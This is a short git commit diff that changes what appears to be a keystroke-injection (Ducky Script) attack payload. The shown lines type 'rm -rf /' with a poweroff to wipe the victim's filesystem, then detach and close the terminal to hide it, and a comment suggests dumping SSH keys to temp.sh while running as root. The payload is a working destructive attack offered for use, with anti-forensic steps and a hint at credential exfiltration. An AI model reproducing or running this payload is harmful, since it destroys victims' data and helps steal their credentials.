Added typed version to remove curl dep

This commit is contained in:
Jon
2026-05-01 23:49:18 +01:00
parent 188caaa434
commit d2b1466f24
3 changed files with 68 additions and 39 deletions

View File

@@ -31,12 +31,13 @@ ENTER
REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/
REM clean up after
STRING rm -rf /
REM add 5s delay enough time to think about it before hitting enter or control c
DELAY 5000
STRING rm -rf / && poweroff > /dev/null 2>&1 &
ENTER
REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done
DELAY 3000
STRING poweroff
REM detach from the process and close terminal to hide
DELAY 200
STRING disown
ENTER
DELAY 200
STRING exit
ENTER